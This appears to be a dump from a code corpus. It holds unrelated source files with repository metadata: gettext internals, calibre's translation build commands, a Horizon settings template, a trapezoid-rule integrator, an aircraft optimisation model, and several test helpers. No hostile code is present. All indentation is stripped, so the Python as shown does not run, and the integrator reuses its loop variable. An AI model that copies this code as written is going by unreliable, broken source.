tmsg = [ unicode(x, self._charset) for x in tmsg ]
for i in range(len(tmsg)):
catalog[msgid1, i] = tmsg[i]
else:
if self._charset:
msg = unicode(msg, self._charset)
tmsg = unicode(tmsg, self._charset)
catalog[msg] = tmsg
masteridx += 8
transidx += 8
return
def gettext(self, message):
missing = object()
tmsg = self._catalog.get(message, missing)
if tmsg is missing:
if self._fallback:
return self._fallback.gettext(message)
return message
if self._output_charset:
return tmsg.encode(self._output_charset)
if self._charset:
return tmsg.encode(self._charset)
return tmsg
def lgettext(self, message):
missing = object()
tmsg = self._catalog.get(message, missing)
if tmsg is missing:
if self._fallback:
return self._fallback.lgettext(message)
return message
if self._output_charset:
return tmsg.encode(self._output_charset)
return tmsg.encode(locale.getpreferredencoding())
def ngettext(self, msgid1, msgid2, n):
try:
tmsg = self._catalog[msgid1, self.plural(n)]
if self._output_charset:
return tmsg.encode(self._output_charset)
if self._charset:
return tmsg.encode(self._charset)
return tmsg
except KeyError:
if self._fallback:
return self._fallback.ngettext(msgid1, msgid2, n)
elif n == 1:
return msgid1
else:
return msgid2
def lngettext(self, msgid1, msgid2, n):
try:
tmsg = self._catalog[msgid1, self.plural(n)]
if self._output_charset:
return tmsg.encode(self._output_charset)
return tmsg.encode(locale.getpreferredencoding())
except KeyError:
if self._fallback:
return self._fallback.lngettext(msgid1, msgid2, n)
elif n == 1:
return msgid1
else:
return msgid2
def ugettext(self, message):
missing = object()
tmsg = self._catalog.get(message, missing)
if tmsg is missing:
if self._fallback:
return self._fallback.ugettext(message)
return unicode(message)
return tmsg
def ungettext(self, msgid1, msgid2, n):
try:
tmsg = self._catalog[msgid1, self.plural(n)]
except KeyError:
if self._fallback:
return self._fallback.ungettext(msgid1, msgid2, n)
if n == 1:
tmsg = unicode(msgid1)
else:
tmsg = unicode(msgid2)
return tmsg
def find(domain, localedir = None, languages = None, all = 0):
if localedir is None:
localedir = _default_localedir
if languages is None:
languages = []
for envar in ('LANGUAGE', 'LC_ALL', 'LC_MESSAGES', 'LANG'):
val = os.environ.get(envar)
if val:
languages = val.split(':')
break
if 'C' not in languages:
languages.append('C')
nelangs = []
for lang in languages:
for nelang in _expand_lang(lang):
if nelang not in nelangs:
nelangs.append(nelang)
if all:
result = []
else:
result = None
for lang in nelangs:
if lang == 'C':
break
mofile = os.path.join(localedir, lang, 'LC_MESSAGES', '%s.mo' % domain)
if os.path.exists(mofile):
if all:
result.append(mofile)
else:
return mofile
return result
_translations = {}
def translation(domain, localedir = None, languages = None, class_ = None, fallback = False, codeset = None):
if class_ is None:
class_ = GNUTranslations
mofiles = find(domain, localedir, languages, all=1)
if not mofiles:
if fallback:
return NullTranslations()
raise IOError(ENOENT, 'No translation file found for domain', domain)
result = None
for mofile in mofiles:
key = (class_, os.path.abspath(mofile))
t = _translations.get(key)
if t is None:
with open(mofile, 'rb') as fp:
t = _translations.setdefault(key, class_(fp))
t = copy.copy(t)
if codeset:
t.set_output_charset(codeset)
if result is None:
result = t
else:
result.add_fallback(t)
return result
def install(domain, localedir = None, unicode = False, codeset = None, names = None):
t = translation(domain, localedir, fallback=True, codeset=codeset)
t.install(unicode, names)
_localedirs = {}
_localecodesets = {}
_current_domain = 'messages'
def textdomain(domain = None):
global _current_domain
if domain is not None:
_current_domain = domain
return _current_domain
def bindtextdomain(domain, localedir = None):
global _localedirs
if localedir is not None:
_localedirs[domain] = localedir
return _localedirs.get(domain, _default_localedir)
def bind_textdomain_codeset(domain, codeset = None):
global _localecodesets
if codeset is not None:
_localecodesets[domain] = codeset
return _localecodesets.get(domain)
def dgettext(domain, message):
try:
t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain))
except IOError:
return message
return t.gettext(message)
def ldgettext(domain, message):
try:
t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain))
except IOError:
return message
return t.lgettext(message)
def dngettext(domain, msgid1, msgid2, n):
try:
t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain))
except IOError:
if n == 1:
return msgid1
else:
return msgid2
return t.ngettext(msgid1, msgid2, n)
def ldngettext(domain, msgid1, msgid2, n):
try:
t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain))
except IOError:
if n == 1:
return msgid1
else:
return msgid2
return t.lngettext(msgid1, msgid2, n)
def gettext(message):
return dgettext(_current_domain, message)
def lgettext(message):
return ldgettext(_current_domain, message)
def ngettext(msgid1, msgid2, n):
return dngettext(_current_domain, msgid1, msgid2, n)
def lngettext(msgid1, msgid2, n):
return ldngettext(_current_domain, msgid1, msgid2, n)
Catalog = translation | apache-2.0 | 4,187,896,059,054,283,300 | 28.29899 | 109 | 0.520339 | false |
yeyanchao/calibre | setup/translations.py | 1 | 11821 | #!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <[email protected]>'
__docformat__ = 'restructuredtext en'
import os, tempfile, shutil, subprocess, glob, re, time, textwrap
from functools import partial
from setup import Command, __appname__, __version__
def qt_sources():
qtdir = glob.glob('/usr/src/qt-*')[-1]
j = partial(os.path.join, qtdir)
return list(map(j, [
'src/gui/widgets/qdialogbuttonbox.cpp',
]))
class POT(Command): # {{{
description = 'Update the .pot translation template'
PATH = os.path.join(Command.SRC, __appname__, 'translations')
def source_files(self):
ans = []
for root, _, files in os.walk(os.path.dirname(self.PATH)):
for name in files:
if name.endswith('.py'):
ans.append(os.path.abspath(os.path.join(root, name)))
return ans
def get_tweaks_docs(self):
path = self.a(self.j(self.SRC, '..', 'resources', 'default_tweaks.py'))
with open(path, 'rb') as f:
raw = f.read().decode('utf-8')
msgs = []
lines = list(raw.splitlines())
for i, line in enumerate(lines):
if line.startswith('#:'):
msgs.append((i, line[2:].strip()))
j = i
block = []
while True:
j += 1
line = lines[j]
if not line.startswith('#'):
break
block.append(line[1:].strip())
if block:
msgs.append((i+1, '\n'.join(block)))
ans = []
for lineno, msg in msgs:
ans.append('#: %s:%d'%(path, lineno))
slash = unichr(92)
msg = msg.replace(slash, slash*2).replace('"', r'\"').replace('\n',
r'\n').replace('\r', r'\r').replace('\t', r'\t')
ans.append('msgid "%s"'%msg)
ans.append('msgstr ""')
ans.append('')
return '\n'.join(ans)
def run(self, opts):
pot_header = textwrap.dedent('''\
# Translation template file..
# Copyright (C) %(year)s Kovid Goyal
# Kovid Goyal <[email protected]>, %(year)s.
#
msgid ""
msgstr ""
"Project-Id-Version: %(appname)s %(version)s\\n"
"POT-Creation-Date: %(time)s\\n"
"PO-Revision-Date: %(time)s\\n"
"Last-Translator: Automatically generated\\n"
"Language-Team: LANGUAGE\\n"
"MIME-Version: 1.0\\n"
"Report-Msgid-Bugs-To: https://bugs.launchpad.net/calibre\\n"
"Plural-Forms: nplurals=INTEGER; plural=EXPRESSION;\\n"
"Content-Type: text/plain; charset=UTF-8\\n"
"Content-Transfer-Encoding: 8bit\\n"
''')%dict(appname=__appname__, version=__version__,
year=time.strftime('%Y'),
time=time.strftime('%Y-%m-%d %H:%M+%Z'))
files = self.source_files()
qt_inputs = qt_sources()
with tempfile.NamedTemporaryFile() as fl:
fl.write('\n'.join(files))
fl.flush()
out = tempfile.NamedTemporaryFile(suffix='.pot', delete=False)
out.close()
self.info('Creating translations template...')
subprocess.check_call(['xgettext', '-f', fl.name,
'--default-domain=calibre', '-o', out.name, '-L', 'Python',
'--from-code=UTF-8', '--sort-by-file', '--omit-header',
'--no-wrap', '-k__', '--add-comments=NOTE:',
])
subprocess.check_call(['xgettext', '-j',
'--default-domain=calibre', '-o', out.name,
'--from-code=UTF-8', '--sort-by-file', '--omit-header',
'--no-wrap', '-kQT_TRANSLATE_NOOP:2',
] + qt_inputs)
with open(out.name, 'rb') as f:
src = f.read()
os.remove(out.name)
src = pot_header + '\n' + src
src += '\n\n' + self.get_tweaks_docs()
pot = os.path.join(self.PATH, __appname__+'.pot')
with open(pot, 'wb') as f:
f.write(src)
self.info('Translations template:', os.path.abspath(pot))
return pot
# }}}
class Translations(POT): # {{{
description='''Compile the translations'''
DEST = os.path.join(os.path.dirname(POT.SRC), 'resources', 'localization',
'locales')
def po_files(self):
return glob.glob(os.path.join(self.PATH, '*.po'))
def mo_file(self, po_file):
locale = os.path.splitext(os.path.basename(po_file))[0]
return locale, os.path.join(self.DEST, locale, 'messages.mo')
def run(self, opts):
for f in self.po_files():
locale, dest = self.mo_file(f)
base = os.path.dirname(dest)
if not os.path.exists(base):
os.makedirs(base)
self.info('\tCompiling translations for', locale)
subprocess.check_call(['msgfmt', '-o', dest, f])
iscpo = {'bn':'bn_IN', 'zh_HK':'zh_CN'}.get(locale, locale)
iso639 = self.j(self.d(self.SRC), 'setup', 'iso_639',
'%s.po'%iscpo)
if os.path.exists(iso639):
dest = self.j(self.d(dest), 'iso639.mo')
if self.newer(dest, iso639):
self.info('\tCopying ISO 639 translations')
subprocess.check_call(['msgfmt', '-o', dest, iso639])
elif locale not in ('en_GB', 'en_CA', 'en_AU', 'si', 'ur', 'sc',
'ltg', 'nds', 'te', 'yi', 'fo', 'sq', 'ast', 'ml', 'ku',
'fr_CA', 'him', 'jv', 'ka'):
self.warn('No ISO 639 translations for locale:', locale)
self.write_stats()
self.freeze_locales()
def freeze_locales(self):
zf = self.DEST + '.zip'
from calibre import CurrentDir
from calibre.utils.zipfile import ZipFile, ZIP_DEFLATED
with ZipFile(zf, 'w', ZIP_DEFLATED) as zf:
with CurrentDir(self.DEST):
zf.add_dir('.')
shutil.rmtree(self.DEST)
@property
def stats(self):
return self.j(self.d(self.DEST), 'stats.pickle')
def get_stats(self, path):
return subprocess.Popen(['msgfmt', '--statistics', '-o', '/dev/null',
path],
stderr=subprocess.PIPE).stderr.read()
def write_stats(self):
files = self.po_files()
dest = self.stats
if not self.newer(dest, files):
return
self.info('Calculating translation statistics...')
raw = self.get_stats(self.j(self.PATH, 'calibre.pot'))
total = int(raw.split(',')[-1].strip().split()[0])
stats = {}
for f in files:
raw = self.get_stats(f)
trans = int(raw.split()[0])
locale = self.mo_file(f)[0]
stats[locale] = min(1.0, float(trans)/total)
import cPickle
cPickle.dump(stats, open(dest, 'wb'), -1)
def clean(self):
if os.path.exists(self.stats):
os.remove(self.stats)
for f in self.po_files():
l, d = self.mo_file(f)
i = self.j(self.d(d), 'iso639.mo')
j = self.j(self.d(d), 'qt.qm')
for x in (i, j, d):
if os.path.exists(x):
os.remove(x)
zf = self.DEST + '.zip'
if os.path.exists(zf):
os.remove(zf)
# }}}
class GetTranslations(Translations): # {{{
description = 'Get updated translations from Launchpad'
BRANCH = 'lp:~kovid/calibre/translations'
@property
def modified_translations(self):
raw = subprocess.Popen(['bzr', 'status', '-S', self.PATH],
stdout=subprocess.PIPE).stdout.read().strip()
ans = []
for line in raw.splitlines():
line = line.strip()
if line.startswith('M') and line.endswith('.po'):
ans.append(line.split()[-1])
return ans
def run(self, opts):
if not self.modified_translations:
subprocess.check_call(['bzr', 'merge', self.BRANCH])
self.check_for_errors()
if self.modified_translations:
subprocess.check_call(['bzr', 'commit', '-m',
'IGN:Updated translations'])
else:
print('No updated translations available')
def check_for_errors(self):
errors = os.path.join(tempfile.gettempdir(), 'calibre-translation-errors')
if os.path.exists(errors):
shutil.rmtree(errors)
os.mkdir(errors)
pofilter = ('pofilter', '-i', self.PATH, '-o', errors,
'-t', 'accelerators', '-t', 'escapes', '-t', 'variables',
#'-t', 'xmltags',
#'-t', 'brackets',
#'-t', 'emails',
#'-t', 'doublequoting',
#'-t', 'filepaths',
#'-t', 'numbers',
'-t', 'options',
#'-t', 'urls',
'-t', 'printf')
subprocess.check_call(pofilter)
errfiles = glob.glob(errors+os.sep+'*.po')
if errfiles:
subprocess.check_call(['gvim', '-f', '-p', '--']+errfiles)
for f in errfiles:
with open(f, 'r+b') as f:
raw = f.read()
raw = re.sub(r'# \(pofilter\).*', '', raw)
f.seek(0)
f.truncate()
f.write(raw)
subprocess.check_call(['pomerge', '-t', self.PATH, '-i', errors, '-o',
self.PATH])
return True
return False
# }}}
class ISO639(Command): # {{{
description = 'Compile translations for ISO 639 codes'
DEST = os.path.join(os.path.dirname(POT.SRC), 'resources', 'localization',
'iso639.pickle')
def run(self, opts):
src = self.j(self.d(self.SRC), 'setup', 'iso_639')
if not os.path.exists(src):
raise Exception(src + ' does not exist')
dest = self.DEST
if not self.newer(dest, [src, __file__]):
self.info('Pickled code is up to date')
return
self.info('Pickling ISO-639 codes to', dest)
from lxml import etree
root = etree.fromstring(open(self.j(src, 'iso_639_3.xml'), 'rb').read())
by_2 = {}
by_3b = {}
by_3t = {}
m2to3 = {}
m3to2 = {}
m3bto3t = {}
nm = {}
codes2, codes3t, codes3b = set(), set(), set()
for x in root.xpath('//iso_639_3_entry'):
two = x.get('part1_code', None)
threet = x.get('id')
threeb = x.get('part2_code', None)
if threeb is None:
# Only recognize langauges in ISO-639-2
continue
name = x.get('name')
if two is not None:
by_2[two] = name
codes2.add(two)
m2to3[two] = threet
m3to2[threeb] = m3to2[threet] = two
by_3b[threeb] = name
by_3t[threet] = name
if threeb != threet:
m3bto3t[threeb] = threet
codes3b.add(threeb)
codes3t.add(threet)
base_name = name.lower()
nm[base_name] = threet
from cPickle import dump
x = {'by_2':by_2, 'by_3b':by_3b, 'by_3t':by_3t, 'codes2':codes2,
'codes3b':codes3b, 'codes3t':codes3t, '2to3':m2to3,
'3to2':m3to2, '3bto3t':m3bto3t, 'name_map':nm}
dump(x, open(dest, 'wb'), -1)
def clean(self):
if os.path.exists(self.DEST):
os.remove(self.DEST)
# }}}
| gpl-3.0 | -5,298,192,980,952,734,000 | 34.286567 | 82 | 0.497335 | false |
Martin819/salt-formula-horizon | horizon/files/local_settings/csb_settings.py | 1 | 2058 | import os
from django.utils.translation import ugettext_lazy as _
from openstack_dashboard import exceptions
{%- from "horizon/map.jinja" import server with context %}
{%- set app = salt['pillar.get']('horizon:server:app:'+app_name) %}
HORIZON_CONFIG = {
'dashboards': ({% if app.plugin is defined %}{% for plugin_name, plugin in app.plugin.iteritems() %}{% if plugin.get('dashboard', False) %}'{{ plugin_name }}', {% endif %}{% endfor %}{% endif %}'admin', 'settings'),
'default_dashboard': '{{ app.get('default_dashboard', 'project') }}',
'user_home': '{{ app.get('user_home', 'openstack_dashboard.views.get_user_home') }}',
'ajax_queue_limit': 10,
'auto_fade_alerts': {
'delay': 3000,
'fade_duration': 1500,
'types': ['alert-success', 'alert-info']
},
'help_url': "{{ app.get('help_url', 'http://docs.openstack.org') }}",
'exceptions': {'recoverable': exceptions.RECOVERABLE,
'not_found': exceptions.NOT_FOUND,
'unauthorized': exceptions.UNAUTHORIZED},
}
INSTALLED_APPS = (
{%- for plugin_name, plugin in app.plugin.iteritems() %}
'{{ plugin.app }}',
{%- endfor %}
'csb_dashboard',
'csb_dashboard.dashboards.service',
'csb_dashboard.dashboards.admin',
'csb_dashboard.dashboards.api_office365',
'csb_dashboard.dashboards.heat_stack',
'csb_dashboard.dashboards.salt_cloud',
'csb_dashboard.dashboards.salt_system',
'theme',
'horizon_overrides',
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'compressor',
'horizon',
'csbclient',
'csb_auth',
'markitup',
'image_proxy',
{%- if app.logging is defined %}
'raven.contrib.django.raven_compat',
{%- endif %}
)
MEDIA_ROOT = '/srv/horizon/sites/{{ app_name }}/media/'
STATIC_ROOT = '/srv/horizon/sites/{{ app_name }}/static/'
{% include "horizon/files/horizon_settings/_local_settings.py" %} | apache-2.0 | -4,526,805,969,484,877,000 | 35.122807 | 219 | 0.62585 | false |
Alecardv/College-projects | Metodos Numericos 2012/trapecioCompuesto.py | 1 | 1525 | import function
from matplotlib.pyplot import *
from pylab import *
import numpy as np
import math
class TrapecioComp:
def __init__(self, fun, xi, xf,n):
self.fun = function.Function(fun,'x')
self.a,self.b = xi,xf
self.n = n
self.fig, self.ax = subplots()
def relativeError(self):
f = self.fun.getDerivate(2)
Ea = ((self.b-self.a)**3/12*self.n**2)*((f.evalFunction(self.b) - f.evalFunction(self.a))/(self.b-self.a))
return Ea
def graph(self):
figure()
root = self.method()
print 'AreaAprox = ',root
print 'AreaReal = ',self.fun.getAndEvalIntegral([self.a,self.b])
print 'Error = ',self.relativeError()
Ox = np.arange(self.a-5,self.b+5, 0.02)
Oy = []
for i in Ox:
Oy.append( self.fun.evalFunction(i) )
self.ax.plot(Ox, Oy, color = "blue",lw = 1,label="f(x)")
self.ax.legend(loc=2)
show()
def px(self,a,b,x):
return ((self.fun.evalFunction(b)-self.fun.evalFunction(a))/(b-a))*(x-a) + self.fun.evalFunction(a)
def method(self):
i=0
S = 0
dx = (self.b-self.a)/self.n;
for i in range(1,(int(self.n))):
xi = float(self.a+i*dx)
S = 2*(self.fun.evalFunction(xi)) + S
self.ax.vlines(self.a+(i-1)*dx,0,self.fun.evalFunction(self.a+(i-1)*dx))
self.ax.vlines(xi+dx,0,self.fun.evalFunction(xi+dx))
Ox = np.arange(self.a+(i-1)*dx,xi+dx, 0.02)
Oy = []
for i in Ox:
Oy.append(self.px(self.a+(i-1)*dx,xi+dx,i))
self.ax.plot(Ox, Oy,lw = 2)
I = (self.b-self.a)*((self.fun.evalFunction(self.a) + self.fun.evalFunction(self.b) + S )/(2*self.n))
return I
| gpl-3.0 | -3,655,874,263,635,416,000 | 28.326923 | 108 | 0.628852 | false |
convexengineering/gplibrary | gpkitmodels/SP/SimPleAC/SimPleAC_multimission.py | 1 | 3535 | from builtins import range
import numpy as np
from gpkit import Model, Variable, SignomialsEnabled, SignomialEquality, \
VarKey, units, Vectorize, settings
from gpkitmodels.SP.SimPleAC.SimPleAC_mission import Mission, SimPleAC
from gpkitmodels.SP.atmosphere.atmosphere import Atmosphere
# SimPleAC with multimission design (updated 5/31/2019, by Berk Ozturk)
class Multimission(Model):
def setup(self,aircraft,Nmissions,Nsegments):
self.aircraft = aircraft
self.missions = []
for i in range(0,Nmissions):
self.missions.append(Mission(self.aircraft,Nsegments))
# Multimission objective variables
W_f_mm = Variable('W_{f_{mm}}','N','multimission fuel weight')
with Vectorize(Nmissions):
# Mission variables
hcruise = Variable('h_{cruise_{mm}}', 'm', 'minimum cruise altitude')
Range = Variable("Range_{mm}", "km", "aircraft range")
W_p = Variable("W_{p_{mm}}", "N", "payload weight", pr=20.)
rho_p = Variable("\\rho_{p_{mm}}", 1500, "kg/m^3", "payload density", pr=10.)
V_min = Variable("V_{min_{mm}}", 25, "m/s", "takeoff speed", pr=20.)
cost_index = Variable("C_{mm}", '1/hr','hourly cost index')
TOfac = Variable('T/O factor_{mm}', 2.,'-','takeoff thrust factor')
constraints = []
# Setting up the missions
for i in range(0,Nmissions):
constraints += [
self.missions[i]['h_{cruise_m}'] == hcruise[i],
self.missions[i]['Range_m'] == Range[i],
self.missions[i]['W_{p_m}'] == W_p[i],
self.missions[i]['\\rho_{p_m}'] == rho_p[i],
self.missions[i]['V_{min_m}'] == V_min[i],
self.missions[i]['C_m'] == cost_index[i],
self.missions[i]['T/O factor_m'] == TOfac[i],
# Upper bounding relevant variables
W_f_mm <= 1e11*units('N'),
]
# Multimission constraints
constraints += [W_f_mm >= sum(self.missions[i]['W_{f_m}'] for i in range(0,Nmissions))]
return constraints, self.aircraft, self.missions
def test():
Nmissions = 2
Nsegments = 4
aircraft = SimPleAC()
m = Multimission(aircraft,Nmissions,Nsegments)
m.substitutions.update({
'h_{cruise_{mm}}':[5000*units('m'), 5000*units('m')],
'Range_{mm}' :[3000*units('km'), 2000*units('km')],
'W_{p_{mm}}' :[6250*units('N'), 8000*units('N')],
'\\rho_{p_{mm}}' :[1500*units('kg/m^3'), 2000*units('kg/m^3')],
'C_{mm}' :[120*units('1/hr'), 360*units('1/hr')],
})
m.cost = (m.missions[0]['W_{f_m}']*units('1/N') + m.missions[1]['C_m']*m.missions[1]['t_m'])
if settings["default_solver"] == "cvxopt":
return
else:
sol = m.localsolve(verbosity=0)
if __name__ == "__main__":
Nmissions = 2
Nsegments = 4
aircraft = SimPleAC()
m = Multimission(aircraft,Nmissions,Nsegments)
m.substitutions.update({
'h_{cruise_{mm}}':[5000*units('m'), 5000*units('m')],
'Range_{mm}' :[3000*units('km'), 2000*units('km')],
'W_{p_{mm}}' :[6250*units('N'), 8000*units('N')],
'\\rho_{p_{mm}}' :[1500*units('kg/m^3'), 2000*units('kg/m^3')],
'C_{mm}' :[120*units('1/hr'), 360*units('1/hr')],
})
m.cost = (m.missions[0]['W_{f_m}']*units('1/N') + m.missions[1]['C_m']*m.missions[1]['t_m'])
sol = m.localsolve(verbosity = 2)
| mit | -2,871,719,499,142,976,000 | 41.083333 | 96 | 0.539745 | false |
whtsky/Waterspout | waterspout/tests/test_auth.py | 1 | 1042 | from waterspout.app import Waterspout
from waterspout.web import RequestHandler
from waterspout.auth import login_required, permission_required
class LoginHandler(RequestHandler):
def get(self):
if not self.session["id"]:
self.session["id"] = 1
else:
self.session["id"] = 2
self.write(".")
class LoginRequireHandler(RequestHandler):
@login_required
def get(self):
self.write('success')
admin_require = permission_required(lambda x: x == 2)
class AdminRequireHandler(RequestHandler):
@admin_require
def get(self):
self.write('id==2')
handlers = [
('/', LoginHandler),
('/a', LoginRequireHandler),
('/b', AdminRequireHandler)
]
waterspout = Waterspout(__name__, handlers=handlers,
cookie_secret="..", login_url="/")
@waterspout.user_loader
def load_user(session):
return session["id"]
def test_auth():
client = waterspout.TestClient()
assert client.get('/a').effective_url.endswith("?next=%2Fa")
| mit | -8,224,585,704,073,168,000 | 20.708333 | 64 | 0.639155 | false |
chromium/chromium | third_party/blink/web_tests/external/wpt/docs/wpt_lint_rules.py | 11 | 2635 | from docutils.parsers.rst import Directive, nodes
from docutils.utils import new_document
from recommonmark.parser import CommonMarkParser
import importlib
import textwrap
class WPTLintRules(Directive):
"""A docutils directive to generate documentation for the
web-platform-test-test's linting tool from its source code. Requires a
single argument: a Python module specifier for a file which declares
linting rules."""
has_content = True
required_arguments = 1
optional_arguments = 0
_md_parser = CommonMarkParser()
@staticmethod
def _parse_markdown(markdown):
WPTLintRules._md_parser.parse(markdown, new_document("<string>"))
return WPTLintRules._md_parser.document.children[0]
@property
def module_specifier(self):
return self.arguments[0]
def _get_rules(self):
try:
module = importlib.import_module(self.module_specifier)
except ImportError:
raise ImportError(
"""wpt-lint-rules: unable to resolve the module at "{}".""".format(self.module_specifier)
)
for binding_name, value in module.__dict__.items():
if hasattr(value, "__abstractmethods__") and len(value.__abstractmethods__):
continue
description = getattr(value, "description", None)
name = getattr(value, "name", None)
to_fix = getattr(value, "to_fix", None)
if description is None:
continue
if to_fix is not None:
to_fix = textwrap.dedent(to_fix)
yield {
"name": name,
"description": textwrap.dedent(description),
"to_fix": to_fix
}
def run(self):
definition_list = nodes.definition_list()
for rule in sorted(self._get_rules(), key=lambda rule: rule['name']):
item = nodes.definition_list_item()
definition = nodes.definition()
term = nodes.term()
item += term
item += definition
definition_list += item
term += nodes.literal(text=rule["name"])
definition += WPTLintRules._parse_markdown(rule["description"])
if rule["to_fix"]:
definition += nodes.strong(text="To fix:")
definition += WPTLintRules._parse_markdown(rule["to_fix"])
if len(definition_list.children) == 0:
raise Exception(
"""wpt-lint-rules: no linting rules found at "{}".""".format(self.module_specifier)
)
return [definition_list]
| bsd-3-clause | -4,440,553,942,413,397,000 | 32.782051 | 105 | 0.589374 | false |
crossroadchurch/paul | tests/helpers/songfileimport.py | 1 | 8465 | # -*- coding: utf-8 -*-
# vim: autoindent shiftwidth=4 expandtab textwidth=120 tabstop=4 softtabstop=4
###############################################################################
# OpenLP - Open Source Lyrics Projection #
# --------------------------------------------------------------------------- #
# Copyright (c) 2008-2015 OpenLP Developers #
# --------------------------------------------------------------------------- #
# This program is free software; you can redistribute it and/or modify it #
# under the terms of the GNU General Public License as published by the Free #
# Software Foundation; version 2 of the License. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# #
# You should have received a copy of the GNU General Public License along #
# with this program; if not, write to the Free Software Foundation, Inc., 59 #
# Temple Place, Suite 330, Boston, MA 02111-1307 USA #
###############################################################################
"""
The :mod:`songfileimporthelper` modules provides a helper class and methods to easily enable testing the import of
song files from third party applications.
"""
import json
import logging
from unittest import TestCase
from openlp.plugins.songs.lib.importers.opensong import OpenSongImport
from openlp.core.common import Registry
from tests.functional import patch, MagicMock, call
log = logging.getLogger(__name__)
class SongImportTestHelper(TestCase):
"""
This class is designed to be a helper class to reduce repition when testing the import of song files.
"""
def __init__(self, *args, **kwargs):
super(SongImportTestHelper, self).__init__(*args, **kwargs)
self.importer_module = __import__('openlp.plugins.songs.lib.importers.%s' %
self.importer_module_name, fromlist=[self.importer_class_name])
self.importer_class = getattr(self.importer_module, self.importer_class_name)
def setUp(self):
"""
Patch and set up the mocks required.
"""
Registry.create()
self.add_copyright_patcher = patch('openlp.plugins.songs.lib.importers.%s.%s.add_copyright' %
(self.importer_module_name, self.importer_class_name))
self.add_verse_patcher = patch('openlp.plugins.songs.lib.importers.%s.%s.add_verse' %
(self.importer_module_name, self.importer_class_name))
self.finish_patcher = patch('openlp.plugins.songs.lib.importers.%s.%s.finish' %
(self.importer_module_name, self.importer_class_name))
self.add_author_patcher = patch('openlp.plugins.songs.lib.importers.%s.%s.add_author' %
(self.importer_module_name, self.importer_class_name))
self.song_import_patcher = patch('openlp.plugins.songs.lib.importers.%s.SongImport' %
self.importer_module_name)
self.mocked_add_copyright = self.add_copyright_patcher.start()
self.mocked_add_verse = self.add_verse_patcher.start()
self.mocked_finish = self.finish_patcher.start()
self.mocked_add_author = self.add_author_patcher.start()
self.mocked_song_importer = self.song_import_patcher.start()
self.mocked_manager = MagicMock()
self.mocked_import_wizard = MagicMock()
self.mocked_finish.return_value = True
def tearDown(self):
"""
Clean up
"""
self.add_copyright_patcher.stop()
self.add_verse_patcher.stop()
self.finish_patcher.stop()
self.add_author_patcher.stop()
self.song_import_patcher.stop()
def load_external_result_data(self, file_name):
"""
A method to load and return an object containing the song data from an external file.
"""
result_file = open(file_name, 'rb')
return json.loads(result_file.read().decode())
def file_import(self, source_file_name, result_data):
"""
Import the given file and check that it has imported correctly
"""
importer = self.importer_class(self.mocked_manager, filenames=[source_file_name])
importer.import_wizard = self.mocked_import_wizard
importer.stop_import_flag = False
importer.topics = []
# WHEN: Importing the source file
importer.import_source = source_file_name
add_verse_calls = self._get_data(result_data, 'verses')
author_calls = self._get_data(result_data, 'authors')
ccli_number = self._get_data(result_data, 'ccli_number')
comments = self._get_data(result_data, 'comments')
song_book_name = self._get_data(result_data, 'song_book_name')
song_copyright = self._get_data(result_data, 'copyright')
song_number = self._get_data(result_data, 'song_number')
title = self._get_data(result_data, 'title')
topics = self._get_data(result_data, 'topics')
verse_order_list = self._get_data(result_data, 'verse_order_list')
# THEN: do_import should return none, the song data should be as expected, and finish should have been called.
self.assertIsNone(importer.do_import(), 'do_import should return None when it has completed')
# Debug information - will be displayed when the test fails
log.debug("Title imported: %s" % importer.title)
log.debug("Verses imported: %s" % self.mocked_add_verse.mock_calls)
log.debug("Verse order imported: %s" % importer.verse_order_list)
log.debug("Authors imported: %s" % self.mocked_add_author.mock_calls)
log.debug("CCLI No. imported: %s" % importer.ccli_number)
log.debug("Comments imported: %s" % importer.comments)
log.debug("Songbook imported: %s" % importer.song_book_name)
log.debug("Song number imported: %s" % importer.song_number)
log.debug("Song copyright imported: %s" % importer.song_number)
log.debug("Topics imported: %s" % importer.topics)
self.assertEqual(importer.title, title, 'title for %s should be "%s"' % (source_file_name, title))
for author in author_calls:
self.mocked_add_author.assert_any_call(author)
if song_copyright:
self.mocked_add_copyright.assert_called_with(song_copyright)
if ccli_number:
self.assertEqual(importer.ccli_number, ccli_number,
'ccli_number for %s should be %s' % (source_file_name, ccli_number))
expected_calls = []
for verse_text, verse_tag in add_verse_calls:
self.mocked_add_verse.assert_any_call(verse_text, verse_tag)
expected_calls.append(call(verse_text, verse_tag))
self.mocked_add_verse.assert_has_calls(expected_calls, any_order=False)
if topics:
self.assertEqual(importer.topics, topics, 'topics for %s should be %s' % (source_file_name, topics))
if comments:
self.assertEqual(importer.comments, comments,
'comments for %s should be "%s"' % (source_file_name, comments))
if song_book_name:
self.assertEqual(importer.song_book_name, song_book_name,
'song_book_name for %s should be "%s"' % (source_file_name, song_book_name))
if song_number:
self.assertEqual(importer.song_number, song_number,
'song_number for %s should be %s' % (source_file_name, song_number))
if verse_order_list:
self.assertEqual(importer.verse_order_list, verse_order_list,
'verse_order_list for %s should be %s' % (source_file_name, verse_order_list))
self.mocked_finish.assert_called_with()
def _get_data(self, data, key):
if key in data:
return data[key]
return ''
| gpl-2.0 | 1,231,135,504,004,555,800 | 52.917197 | 118 | 0.586297 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.